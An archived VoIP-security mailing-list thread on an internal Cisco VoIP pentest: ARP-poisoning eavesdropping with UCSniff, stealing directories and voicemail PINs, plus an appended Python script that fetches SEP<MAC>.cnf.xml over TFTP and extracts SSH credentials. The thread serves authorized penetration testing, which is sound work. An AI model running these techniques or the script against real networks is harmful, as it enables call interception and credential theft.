[VOIPSEC] pentesting voip network-please help
satyam tyagi
satyam_tyagi at hotmail.com
Sat Jan 30 01:49:45 CST 2010
http://www.unifysquare.com/resources/UnifySquare%20VLAN%20Security%20Whitepaper%20-%20English.pdf
Hope the above helps,
Thanks, Satyam
> Date: Fri, 29 Jan 2010 13:00:46 -0600
> From: jpo at pobox.com
> To: mzcohen2682 at aim.com
> CC: voipsec at voipsa.org
> Subject: Re: [VOIPSEC] pentesting voip network-please help
>
> Ah, an internal VoIP pentest - the fun has begun for you, my friend.
> This is one of the things that we live and breathe for.
>
> So from what I gather: you're in the middle of an internal pentest, you
> don't know the names of the image files, you can't capture RTP, and you
> are connected to the voip vlan, correct?
>
> Let's back up a second and assume nothing, and at the same time suggest
> a few general methods, specific steps:
>
> 1. Why do you want to download the image files? What attack are you
> trying to do here? Unless you can be MitM during the image file
> download or have a Ph.D. in reverse engineering software, I'm not sure
> how downloading the image file from your laptop is going to help you.
>
> 2. So you have physical access to the IP Phone. Have you tried using a
> hub first for passive eavesdropping? You can share the connection from
> the wall with your laptop and phone, and completely fingerprint the IP
> Phone, downloading its phone configuration file, and placing sample
> calls. This is one of the first methods, and the safest - it does
> require an external power supply for the IP Phone. The network trace
> file can then be compared against MitM eavesdropping attacks to see what
> you are missing when you use a LAN-based MitM ARP Poisoning attack, to
> simulate what regular VoIP users are capable of doing.
>
> 3. You mention downloading the firmware files via brute force attacks,
> and finding interesting information in them, like passwords. I believe
> the phone configuration is what you are looking for (not the firmware
> image). Can you confirm that the environment uses SIP or Skinny (SCCP)
> line side signaling? Since this is UCM 6.1.3 environment, it's likely
> that this is SCCP since that is the default signaling. You should be
> looking for the SEP CNF xml file. If you know the MAC address of the IP
> phone, it's "SEP<mac>.cnf.xml". SIPDefault is for SIP signaling, which
> will be rare with the Callmanager version you mention, in a default
> installation.
>
> 4. You mention that you tried to capture RTP conversations without
> success and you are connected to the VoIP VLAN. How do you know you are
> connected to the VoIP VLAN? Is your test laptop connected to the PC
> port of the IP Phone, or have you connected directly to the wall? What
> is the native VLAN and Voice VLAN? Does your test machine have a valid
> IP address in the voice vlan and how have you verified this? Only then
> can you conduct an eavesdropping attack when QoS is configured. There
> are many VoIP sniffers out there but in my opinion the best is UCSniff
> [1] (I am biased, I am the co-author of this tool). UCSniff is free and
> highly specialized for pentesting in a Cisco VoIP environment, and is
> constantly tested against the latest Cisco Unified IP Phones and
> Callmanager software, simulating the most common Cisco production
> enterprise deployments. Some of the things you need to do:
>
> 1. First verify that you have a valid IP address in the VoIP VLAN, as a
> valid registered IP Phone. Can you ping other IP Phones from the same
> VLAN? Does your laptop have a Voice VLAN sub-interface like eth0.x
> where x is the voice vlan? When you browse the IP Phone settings in the
> LCD, what does the Admin VLAN ID and Operational VLAN ID settings tell you?
> 2. Run UCSniff in targeted user mode, which will only conduct the VoIP
> eavesdropping attack against a single Cisco Unified IP Phone (minimizing
> the risk of service impact against the entire VoIP VLAN)
> 3. Run a Wireshark trace in parallel, to see the captured traffic.
> What is the audio codec used? Is the trace similar to step 2, with the
> passive traffic trace? Do you receive all SCCP signaling to and from
> the Phone? Do you receive all RTP media stream traffic to or from the
> phone?
> 4. If you are actually doing a MitM arp poisoning attack against the
> network and aren't receiving all traffic to or from the phone, it could
> be an issue with GARP Disabled setting on the IP Phone. UCSniff has a
> feature to change the configuration of the Cisco IP Phone and also
> defeat GARP Disabled with a race condition unicast ARP reply flooding.
> See the UCSniff documentation and website for more information.
> 5. Some of the other VoIP vulnerability demonstrations you can show
> your customer: download /theft of VoIP corporate directory (ucsniff
> does) for targeted eavesdropping based on corporate directory, UC
> keystroke logger (theft of Cisco Unity voice mail passwords, or any
> dialed digits, i.e., banking IVR application)
> 6. There are also other media insertion and replay attacks that you can
> do. Please take a look at the VOIPSA tools list [2], some of the VoIP
> Hacking Exposed [3] tools, and the free VAST [4] Linux Distro, a VoIP
> pentest OS which contains a lot of the VoIP Security tools (including
> UCSniff) already pre-installed.
>
> There are many, many layers deep to the methods and specific steps, but
> this is an initial starting point. Send any more information to this
> list, and we will do our best to help. You can also send me an email
> off-list directly to jostrom at viperlab.net with any specific data, pcap
> traces, or SEP cnf xml files, and I will help.
>
> [1] UCSniff Video / VoIP Sniffer:
> http://ucsniff.sf.net
>
> [2] VOIPSA Tools list:
> http://www.voipsa.org/Resources/tools.php
>
> [3] VoIP Hacking Exposed tools
> http://www.hackingvoip.com/
>
> [4] VIPER VAST Linux Distro
> http://vipervast.sf.net
>
>
>
> mzcohen2682 at aim.com wrote:
> > hi all !!
> >
> > I'm doing an internal (LAN) pentest for a VoIP network. The network has 6 Cisco Call Manager version 6.1.3 as a cluster. They have Cisco phones 7911 and 7941. They use a separate VLAN for the VoIP network.
> >
> > I started by trying to download the image files for the phones from the TFTP server by doing a brute-force attack on the names of the files.
> >
> > I have access to one of the 7941 phones so I checked that the version of the image is 4.0/8.0 (9.0)
> > I'm not sure what the names of the image files that the phones load after boot should be, but according to Cisco documentation there must be SIPdefault.cnf and OS79xx.txt in the root directory of the TFTP server. But I tried and they are not there..
> >
> > So what are the names of the files? I read a document that said that if I am able to download those files I will find lots of interesting information like phone passwords etc..
> >
> > After that... I tried to capture some RTP conversations but without any success. I am connected to the VoIP VLAN and used Wireshark but it doesn't detect any calls! Should I do some ARP spoofing attack? But to which MACs?
> >
> > Any other ideas on how to continue with this pentest?
> >
> > What I see is that although the client didn't implement encryption or any other security control, just the VLAN, it isn't so easy to pentest a VoIP network..
> >
> > thanks
> >
> > marco
> >
> >
> >
> >
> > _______________________________________________
> > Voipsec mailing list
> > Voipsec at voipsa.org
> > http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
> >
> >
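The two concrete points in Jon's reply that Marco's TFTP brute force missed are (a) the per-phone file is "SEP<mac>.cnf.xml", not SIPDefault or a firmware image, and (b) a plain RFC 1350 read request fetches it, no authentication involved. The script below is an added example written for this thread; it is not code from the thread, from UCSniff or from Cisco. It derives the file name from a MAC address, implements the TFTP read exchange (RRQ, DATA, ACK, ERROR) over UDP, and pulls out the elements a pentester would look at first. The element names in INTERESTING, the placeholder values in SAMPLE_CNF, the 192.0.2.10 address and the MAC are all assumptions; which elements a real config carries depends on the CUCM version and phone model. The loopback "server" in `_toy_server` exists only so the script runs offline; against a real cluster, point `tftp_get` at the TFTP server address shown in the phone's network settings.

```python
"""Derive SEP<MAC>.cnf.xml, fetch it over TFTP (RFC 1350 read) and list the
interesting configuration fields. Added example for the VOIPSEC thread; not
UCSniff or Cisco code. Field names and the sample config are assumptions."""
import re
import socket
import struct
import threading
import xml.etree.ElementTree as ET

TFTP_PORT = 69
RRQ, DATA, ACK, ERROR = 1, 3, 4, 5
BLOCK = 512

# Elements worth reading in the per-phone config. ASSUMPTION: which of these
# appear (and their names) varies by CUCM version and phone model.
INTERESTING = ("deviceProtocol", "processNodeName", "loadInformation",
               "sshUserId", "sshPassword", "authenticationURL", "directoryURL")

# CONSTRUCTED sample standing in for what the TFTP server returns.
SAMPLE_CNF = b"""<device>
  <deviceProtocol>SCCP</deviceProtocol>
  <devicePool>
    <callManagerGroup><members><member priority="0"><callManager>
      <processNodeName>192.0.2.10</processNodeName>
    </callManager></member></members></callManagerGroup>
  </devicePool>
  <loadInformation>placeholder-load</loadInformation>
  <sshUserId>placeholder-user</sshUserId>
  <sshPassword>placeholder-pass</sshPassword>
  <directoryURL>http://192.0.2.10:8080/directory</directoryURL>
</device>
"""

def cnf_filename(mac: str) -> str:
    """Phones request SEP<MAC>.cnf.xml at boot: 'SEP' plus the MAC as 12
    upper-case hex digits without separators (thread item 3)."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return f"SEP{digits.upper()}.cnf.xml"

def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """TFTP read request: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"

def build_ack(block: int) -> bytes:
    return struct.pack("!HH", ACK, block)

def parse_data(pkt: bytes):
    """Return (block number, payload) for a DATA packet; raise on ERROR."""
    opcode, num = struct.unpack("!HH", pkt[:4])
    if opcode == ERROR:
        msg = pkt[4:].rstrip(b"\0").decode(errors="replace")
        raise OSError(f"TFTP error {num}: {msg}")
    if opcode != DATA:
        raise OSError(f"unexpected TFTP opcode {opcode}")
    return num, pkt[4:]

def tftp_get(host: str, filename: str, port: int = TFTP_PORT, timeout: float = 3.0) -> bytes:
    """RRQ to port 69, then ACK each DATA block from the server's transfer
    port (TID) until a block shorter than 512 bytes ends the transfer."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_rrq(filename), (host, port))
    out, expected, tid = bytearray(), 1, None
    try:
        while True:
            pkt, addr = sock.recvfrom(4 + BLOCK)
            if tid is None:
                tid = addr            # server answers from a fresh port
            elif addr != tid:
                continue              # stray datagram from another source
            num, payload = parse_data(pkt)
            if num == expected:       # duplicates are re-ACKed, not appended
                out += payload
                expected += 1
            sock.sendto(build_ack(num), tid)
            if len(payload) < BLOCK:
                return bytes(out)
    finally:
        sock.close()

def extract_fields(cnf_xml: bytes) -> dict:
    """Collect INTERESTING elements wherever they sit in the document."""
    found = {}
    for elem in ET.fromstring(cnf_xml).iter():
        if elem.tag in INTERESTING and elem.text and elem.text.strip():
            found.setdefault(elem.tag, []).append(elem.text.strip())
    return found

def _toy_server(data: bytes, listen: socket.socket) -> None:
    """Loopback stand-in for the CUCM TFTP service: serves one RRQ."""
    req, client = listen.recvfrom(1024)
    xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # new TID
    xfer.settimeout(3.0)
    if struct.unpack("!H", req[:2])[0] != RRQ:
        xfer.sendto(struct.pack("!HH", ERROR, 4) + b"Illegal operation\0", client)
        return
    chunks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)] or [b""]
    if len(chunks[-1]) == BLOCK:
        chunks.append(b"")    # exact multiple of 512: empty block ends it
    for num, chunk in enumerate(chunks, 1):
        xfer.sendto(struct.pack("!HH", DATA, num) + chunk, client)
        ack, _ = xfer.recvfrom(4)
        if ack != build_ack(num):
            break
    xfer.close()

if __name__ == "__main__":
    listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listen.bind(("127.0.0.1", 0))
    threading.Thread(target=_toy_server, args=(SAMPLE_CNF, listen), daemon=True).start()
    name = cnf_filename("00:1A:A1:2B:3C:4D")        # made-up phone MAC
    body = tftp_get("127.0.0.1", name, port=listen.getsockname()[1])
    print(name, len(body), "bytes")
    for tag, values in extract_fields(body).items():
        print(f"  {tag}: {', '.join(values)}")
```

Two practical notes for using this on an engagement. The client only proceeds once it has the phone's MAC, which answers Marco's brute-force problem: enumerate MACs (the phone's own settings menu, the switch MAC table, or CDP/ARP traffic on the voice VLAN) rather than file names. And the transfer port check (`addr != tid`) matters on a busy VLAN, since TFTP has no session identifier beyond the source port; a fetch that silently mixes datagrams from two servers produces a corrupt file that parses as nothing useful.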